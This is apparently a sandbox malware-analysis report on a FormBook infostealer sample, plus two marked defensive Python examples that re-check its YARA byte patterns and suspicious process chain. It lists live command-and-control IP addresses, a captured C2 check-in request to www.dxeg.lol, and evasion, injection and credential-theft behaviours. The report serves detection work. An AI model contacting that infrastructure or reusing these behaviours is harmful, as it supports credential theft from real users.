Windows Analysis Report
update SOA.exe

Overview

General Information

Sample name: update SOA.exe
Analysis ID: 1522849
MD5: 309a3f5ca72ff071a0edd351eb3c6691
SHA1: 64a06df557469bda25a3d3b6526a9e7eade67f63
SHA256: cad71f61562fdc34dafc567081d21ff6044322ff75b67c3b5172fba7f4ee1e5d
Tags: exe, Formbook, user-cocaman

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • update SOA.exe (PID: 1812 cmdline: "C:\Users\user\Desktop\update SOA.exe" MD5: 309A3F5CA72FF071A0EDD351EB3C6691)
    • svchost.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\update SOA.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HAdkDWMZRiGMZe.exe (PID: 2296 cmdline: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • notepad.exe (PID: 2656 cmdline: "C:\Windows\SysWOW64\notepad.exe" MD5: E92D3A824A0578A50D2DD81B5060145F)
          • HAdkDWMZRiGMZe.exe (PID: 1220 cmdline: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4568 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (11 entries in the full report; the entries shown on this page):

Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown; Strings:
    • 0x2c060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1412f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown; Strings:
    • 0x27f16d:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x26723c:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Yara matches in unpacked PE files:

Source: 2.2.svchost.exe.400000.0.unpack; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 2.2.svchost.exe.400000.0.unpack; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown; Strings:
    • 0x2e693:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16762:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 2.2.svchost.exe.400000.0.raw.unpack; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 2.2.svchost.exe.400000.0.raw.unpack; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown; Strings:
    • 0x2f493:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17562:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
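The string hits above give the two byte sequences of Windows_Trojan_Formbook_1112e116 ($a2 and $a3) and the offset at which each was found in every dump. The Python below is an added example, not part of the Joe Sandbox report and not the Elastic or Joe Security rule sources; it turns such YARA-style hex strings into a scanner for a raw memory dump so the reported offsets can be re-verified without a yara binary, and it also accepts ?? wildcards, which the two strings on this page do not use. The dump it scans is constructed: zero filler with the two strings placed at the offsets the report lists for the 00000005 (notepad.exe) dump.

```python
import re

# Byte patterns copied from the Windows_Trojan_Formbook_1112e116 hits listed in the report above.
PATTERNS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}


def compile_hex(pattern):
    """Compile a YARA-style hex string ('74 0A ?? 0F ...') into a bytes regex.

    Each two-digit token becomes one escaped byte; '??' becomes a single-byte wildcard.
    DOTALL makes the wildcard match 0x0A as well.
    """
    parts = []
    for tok in pattern.split():
        if tok == "??":
            parts.append(b".")
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buf, patterns=PATTERNS):
    """Return {string_name: [offsets]} for every occurrence of each pattern in buf."""
    hits = {}
    for name, pat in patterns.items():
        offsets = [m.start() for m in compile_hex(pat).finditer(buf)]
        if offsets:
            hits[name] = offsets
    return hits


def is_formbook(buf, min_strings=1):
    """Mimic an 'any of them' condition: at least min_strings distinct strings present."""
    return len(scan(buf)) >= min_strings


def make_dump(size=0x30000):
    """Constructed test buffer (not a real dump): zero filler with $a2 and $a3 placed at the
    offsets the report gives for dump 00000005.00000002.3882344624.0000000002B80000."""
    buf = bytearray(size)
    for name, off in (("$a2", 0x2C060), ("$a3", 0x1412F)):
        raw = bytes.fromhex(PATTERNS[name].replace(" ", ""))
        buf[off:off + len(raw)] = raw
    return bytes(buf)


if __name__ == "__main__":
    dump = make_dump()
    for name, offsets in scan(dump).items():
        print(name, [hex(o) for o in offsets])
    print("FormBook:", is_formbook(dump))
```

To check a real dump, replace make_dump() with the bytes of the .sdmp file; a hit at an offset other than the one the report lists is expected for a different dump, a missing hit for the same dump is not.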

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" , CommandLine: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe, NewProcessName: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe, OriginalFileName: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe, ParentCommandLine: "C:\Windows\SysWOW64\notepad.exe", ParentImage: C:\Windows\SysWOW64\notepad.exe, ParentProcessId: 2656, ParentProcessName: notepad.exe, ProcessCommandLine: "C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe" , ProcessId: 1220, ProcessName: HAdkDWMZRiGMZe.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\update SOA.exe", CommandLine: "C:\Users\user\Desktop\update SOA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\update SOA.exe", ParentImage: C:\Users\user\Desktop\update SOA.exe, ParentProcessId: 1812, ParentProcessName: update SOA.exe, ProcessCommandLine: "C:\Users\user\Desktop\update SOA.exe", ProcessId: 2788, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\update SOA.exe", CommandLine: "C:\Users\user\Desktop\update SOA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\update SOA.exe", ParentImage: C:\Users\user\Desktop\update SOA.exe, ParentProcessId: 1812, ParentProcessName: update SOA.exe, ProcessCommandLine: "C:\Users\user\Desktop\update SOA.exe", ProcessId: 2788, ProcessName: svchost.exe
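The Sigma hits above and the process tree in the Overview describe the same chain: svchost.exe started with the sample's own command line (the image on disk and the command line disagree, which is what process replacement looks like in a process-creation log), the payload copied into a randomly named directory under Program Files (x86), and notepad.exe acting as the parent of a second payload instance and of firefox.exe. The Python below is an added example, not part of the Joe Sandbox report and not the Sigma rules themselves; it re-checks those four traits over the report's process creation events. The allow-list of legitimate svchost.exe parents (services.exe only) and the set of suspicious parents (notepad.exe only) are simplified assumptions, and the final services.exe/svchost.exe event is a constructed benign control that is not in the report.

```python
import ntpath
from collections import defaultdict

PAYLOAD_DIR = r"C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU"

# Process creation events transcribed from the report's process tree.
# The last event (pid 900) is a constructed benign control, not from the report.
EVENTS = [
    {"pid": 1812, "image": r"C:\Users\user\Desktop\update SOA.exe",
     "cmdline": r'"C:\Users\user\Desktop\update SOA.exe"', "parent_image": None},
    {"pid": 2788, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\update SOA.exe"',
     "parent_image": r"C:\Users\user\Desktop\update SOA.exe"},
    {"pid": 2296, "image": PAYLOAD_DIR + r"\HAdkDWMZRiGMZe.exe",
     "cmdline": '"' + PAYLOAD_DIR + r'\HAdkDWMZRiGMZe.exe"',
     "parent_image": r"C:\Windows\SysWOW64\svchost.exe"},
    {"pid": 2656, "image": r"C:\Windows\SysWOW64\notepad.exe",
     "cmdline": r'"C:\Windows\SysWOW64\notepad.exe"',
     "parent_image": PAYLOAD_DIR + r"\HAdkDWMZRiGMZe.exe"},
    {"pid": 1220, "image": PAYLOAD_DIR + r"\HAdkDWMZRiGMZe.exe",
     "cmdline": '"' + PAYLOAD_DIR + r'\HAdkDWMZRiGMZe.exe"',
     "parent_image": r"C:\Windows\SysWOW64\notepad.exe"},
    {"pid": 4568, "image": r"C:\Program Files\Mozilla Firefox\Firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"',
     "parent_image": r"C:\Windows\SysWOW64\notepad.exe"},
    {"pid": 900, "image": r"C:\Windows\System32\svchost.exe",  # constructed benign control
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "parent_image": r"C:\Windows\System32\services.exe"},
]

LEGIT_SVCHOST_PARENTS = {"services.exe"}  # assumption: minimal allow-list; the real Sigma rule allows more
SUSPICIOUS_PARENTS = {"notepad.exe"}      # assumption: only the parent seen in this report's tree


def base(path):
    """Lower-cased file name of a Windows path (works on any host via ntpath)."""
    return ntpath.basename(path).lower() if path else ""


def first_token(cmdline):
    """The executable part of a Windows command line: a quoted path or the first space-delimited word."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def looks_random(component, min_len=32):
    """Heuristic for generated directory names: long, purely alphanumeric, mixed case."""
    return (len(component) >= min_len and component.isalnum()
            and any(c.isupper() for c in component) and any(c.islower() for c in component))


def analyze(events):
    """Return {pid: [reasons]} for every event that trips at least one check."""
    findings = defaultdict(list)
    for ev in events:
        image, parent = base(ev["image"]), base(ev["parent_image"])
        # Image on disk vs. executable named in the command line: mismatch = hollowing/replacement.
        if base(first_token(ev["cmdline"])) != image:
            findings[ev["pid"]].append("cmdline_image_mismatch")
        # svchost.exe is normally only started by services.exe.
        if image == "svchost.exe" and parent not in LEGIT_SVCHOST_PARENTS:
            findings[ev["pid"]].append("svchost_uncommon_parent")
        # Parents that should never spawn other executables.
        if parent in SUSPICIOUS_PARENTS:
            findings[ev["pid"]].append("suspicious_parent")
        # A generated-looking directory anywhere in the image path.
        if any(looks_random(part) for part in ev["image"].split("\\")):
            findings[ev["pid"]].append("random_dir_name")
    return dict(findings)


if __name__ == "__main__":
    for pid, reasons in analyze(EVENTS).items():
        print(pid, ", ".join(reasons))
```

The same four checks apply unchanged to Sysmon event 1 or Windows 4688 records once the Image, CommandLine and ParentImage fields are mapped onto the event dictionaries.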
Suricata alerts, SID 2050745 (ET MALWARE FormBook CnC Checkin (GET) M5), severity 1, classtype "Malware Command and Control Activity Detected", protocol TCP:

Timestamp                        Source IP:Port     Destination IP:Port
2024-09-30T18:44:31.185960+0200  192.168.2.5:49711  137.175.33.56:80
2024-09-30T18:44:54.473989+0200  192.168.2.5:49716  3.33.130.190:80
2024-09-30T18:45:08.252588+0200  192.168.2.5:49720  3.33.130.190:80
2024-09-30T18:45:24.969888+0200  192.168.2.5:49724  188.114.96.3:80
2024-09-30T18:45:39.051168+0200  192.168.2.5:49728  31.31.196.17:80
2024-09-30T18:45:52.448504+0200  192.168.2.5:49732  3.33.130.190:80
2024-09-30T18:46:06.630905+0200  192.168.2.5:49736  3.33.130.190:80
2024-09-30T18:46:20.598814+0200  192.168.2.5:49740  199.192.21.169:80
2024-09-30T18:46:34.481837+0200  192.168.2.5:49744  3.33.130.190:80
2024-09-30T18:46:47.677651+0200  192.168.2.5:49748  188.114.96.3:80

Suricata alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2), severity 1, classtype "A Network Trojan was detected", protocol TCP (the same ten GET connections as SID 2050745):

Timestamp                        Source IP:Port     Destination IP:Port
2024-09-30T18:44:31.185960+0200  192.168.2.5:49711  137.175.33.56:80
2024-09-30T18:44:54.473989+0200  192.168.2.5:49716  3.33.130.190:80
2024-09-30T18:45:08.252588+0200  192.168.2.5:49720  3.33.130.190:80
2024-09-30T18:45:24.969888+0200  192.168.2.5:49724  188.114.96.3:80
2024-09-30T18:45:39.051168+0200  192.168.2.5:49728  31.31.196.17:80
2024-09-30T18:45:52.448504+0200  192.168.2.5:49732  3.33.130.190:80
2024-09-30T18:46:06.630905+0200  192.168.2.5:49736  3.33.130.190:80
2024-09-30T18:46:20.598814+0200  192.168.2.5:49740  199.192.21.169:80
2024-09-30T18:46:34.481837+0200  192.168.2.5:49744  3.33.130.190:80
2024-09-30T18:46:47.677651+0200  192.168.2.5:49748  188.114.96.3:80

Suricata alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3), severity 1, classtype "A Network Trojan was detected", protocol TCP:

Timestamp                        Source IP:Port     Destination IP:Port
2024-09-30T18:44:46.814759+0200  192.168.2.5:49713  3.33.130.190:80
2024-09-30T18:44:50.271880+0200  192.168.2.5:49714  3.33.130.190:80
2024-09-30T18:44:51.911631+0200  192.168.2.5:49715  3.33.130.190:80
2024-09-30T18:45:00.003802+0200  192.168.2.5:49717  3.33.130.190:80
2024-09-30T18:45:02.521743+0200  192.168.2.5:49718  3.33.130.190:80
2024-09-30T18:45:05.075570+0200  192.168.2.5:49719  3.33.130.190:80
2024-09-30T18:45:15.518326+0200  192.168.2.5:49721  188.114.96.3:80
2024-09-30T18:45:18.127639+0200  192.168.2.5:49722  188.114.96.3:80
2024-09-30T18:45:20.674358+0200  192.168.2.5:49723  188.114.96.3:80
2024-09-30T18:45:30.783978+0200  192.168.2.5:49725  31.31.196.17:80
2024-09-30T18:45:33.928191+0200  192.168.2.5:49726  31.31.196.17:80
2024-09-30T18:45:36.499997+0200  192.168.2.5:49727  31.31.196.17:80
2024-09-30T18:45:44.803733+0200  192.168.2.5:49729  3.33.130.190:80
2024-09-30T18:45:47.605022+0200  192.168.2.5:49730  3.33.130.190:80
2024-09-30T18:45:49.890046+0200  192.168.2.5:49731  3.33.130.190:80
2024-09-30T18:45:57.946440+0200  192.168.2.5:49733  3.33.130.190:80
2024-09-30T18:46:00.491065+0200  192.168.2.5:49734  3.33.130.190:80
2024-09-30T18:46:03.052545+0200  192.168.2.5:49735  3.33.130.190:80
2024-09-30T18:46:12.840052+0200  192.168.2.5:49737  199.192.21.169:80
2024-09-30T18:46:15.509966+0200  192.168.2.5:49738  199.192.21.169:80
2024-09-30T18:46:18.150197+0200  192.168.2.5:49739  199.192.21.169:80
2024-09-30T18:46:26.314021+0200  192.168.2.5:49741  3.33.130.190:80
2024-09-30T18:46:29.738124+0200  192.168.2.5:49742  3.33.130.190:80
2024-09-30T18:46:31.922116+0200  192.168.2.5:49743  3.33.130.190:80
2024-09-30T18:46:40.040590+0200  192.168.2.5:49745  188.114.96.3:80
2024-09-30T18:46:42.546070+0200  192.168.2.5:49746  188.114.96.3:80
2024-09-30T18:46:45.069786+0200  192.168.2.5:49747  188.114.96.3:80
2024-09-30T18:46:53.641925+0200  192.168.2.5:49749  84.32.84.32:80


            AV Detection

Source: update SOA.exe; ReversingLabs: Detection: 42%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: update SOA.exe; Joe Sandbox ML: detected
Source: update SOA.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: notepad.pdbGCTL source: svchost.exe, 00000002.00000003.2312196681.0000000003443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2312112066.000000000341A000.00000004.00000020.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000002.3882959194.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: notepad.pdb source: svchost.exe, 00000002.00000003.2312196681.0000000003443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2312112066.000000000341A000.00000004.00000020.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000002.3882959194.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HAdkDWMZRiGMZe.exe, 00000004.00000000.2266285714.00000000004CE000.00000002.00000001.01000000.00000005.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3882332650.00000000004CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: update SOA.exe, 00000000.00000003.2070210673.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2071406574.0000000004890000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2070693180.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250582687.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252532945.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2349001032.0000000004AEC000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2347352548.0000000004935000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: update SOA.exe, 00000000.00000003.2070210673.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2071406574.0000000004890000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2070693180.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2250582687.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252532945.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, notepad.exe, 00000005.00000003.2349001032.0000000004AEC000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2347352548.0000000004935000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3885110150.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2635917732.000000002370C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3885110150.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2635917732.000000002370C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\notepad.exe; Code function: 5_2_02B9C520 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\notepad.exe; Code function: 4x nop then xor eax, eax (5_2_02B89B80)
Source: C:\Windows\SysWOW64\notepad.exe; Code function: 4x nop then mov ebx, 00000004h (5_2_04B804E8)
Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe; Code function: 4x nop then pop edi (6_2_0553769B)
Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe; Code function: 4x nop then mov esp, ebp (6_2_05535029)
Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe; Code function: 4x nop then xor eax, eax (6_2_0553ABB1)

            Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 (10 alerts):
  • 192.168.2.5:49711 -> 137.175.33.56:80
  • 192.168.2.5:49716 -> 3.33.130.190:80
  • 192.168.2.5:49720 -> 3.33.130.190:80
  • 192.168.2.5:49724 -> 188.114.96.3:80
  • 192.168.2.5:49728 -> 31.31.196.17:80
  • 192.168.2.5:49732 -> 3.33.130.190:80
  • 192.168.2.5:49736 -> 3.33.130.190:80
  • 192.168.2.5:49740 -> 199.192.21.169:80
  • 192.168.2.5:49744 -> 3.33.130.190:80
  • 192.168.2.5:49748 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 (10 alerts, on the same ten GET connections):
  • 192.168.2.5:49711 -> 137.175.33.56:80
  • 192.168.2.5:49716 -> 3.33.130.190:80
  • 192.168.2.5:49720 -> 3.33.130.190:80
  • 192.168.2.5:49724 -> 188.114.96.3:80
  • 192.168.2.5:49728 -> 31.31.196.17:80
  • 192.168.2.5:49732 -> 3.33.130.190:80
  • 192.168.2.5:49736 -> 3.33.130.190:80
  • 192.168.2.5:49740 -> 199.192.21.169:80
  • 192.168.2.5:49744 -> 3.33.130.190:80
  • 192.168.2.5:49748 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 (28 alerts):
  • 192.168.2.5:49713 -> 3.33.130.190:80
  • 192.168.2.5:49714 -> 3.33.130.190:80
  • 192.168.2.5:49715 -> 3.33.130.190:80
  • 192.168.2.5:49717 -> 3.33.130.190:80
  • 192.168.2.5:49718 -> 3.33.130.190:80
  • 192.168.2.5:49719 -> 3.33.130.190:80
  • 192.168.2.5:49721 -> 188.114.96.3:80
  • 192.168.2.5:49722 -> 188.114.96.3:80
  • 192.168.2.5:49723 -> 188.114.96.3:80
  • 192.168.2.5:49725 -> 31.31.196.17:80
  • 192.168.2.5:49726 -> 31.31.196.17:80
  • 192.168.2.5:49727 -> 31.31.196.17:80
  • 192.168.2.5:49729 -> 3.33.130.190:80
  • 192.168.2.5:49730 -> 3.33.130.190:80
  • 192.168.2.5:49731 -> 3.33.130.190:80
  • 192.168.2.5:49733 -> 3.33.130.190:80
  • 192.168.2.5:49734 -> 3.33.130.190:80
  • 192.168.2.5:49735 -> 3.33.130.190:80
  • 192.168.2.5:49737 -> 199.192.21.169:80
  • 192.168.2.5:49738 -> 199.192.21.169:80
  • 192.168.2.5:49739 -> 199.192.21.169:80
  • 192.168.2.5:49741 -> 3.33.130.190:80
  • 192.168.2.5:49742 -> 3.33.130.190:80
  • 192.168.2.5:49743 -> 3.33.130.190:80
  • 192.168.2.5:49745 -> 188.114.96.3:80
  • 192.168.2.5:49746 -> 188.114.96.3:80
  • 192.168.2.5:49747 -> 188.114.96.3:80
  • 192.168.2.5:49749 -> 84.32.84.32:80
Source: Joe Sandbox View; IP Address: 199.192.21.169
Source: Joe Sandbox View; IP Address: 188.114.96.3
Source: Joe Sandbox View; ASN Name: PEGTECHINCUS
Source: Joe Sandbox View; ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View; ASN Name: AS-REGRU
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: global traffic; HTTP traffic detected:
GET /mxqs/?gHCXmDU=rHSAWCOTv0B2OyWbYMKwkuU+0pm+dYnzeuWywUFjfL0Y5nHDImWR+DkgzCKA2Uf76rKFoLo4oU5TM+FaPt+JwQr3UHywKVmmcKRjYyDIvIOI0clKCIXncFUG+d5lZOlczw==&Gh9=g8u8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.dxeg.lol
Connection: close
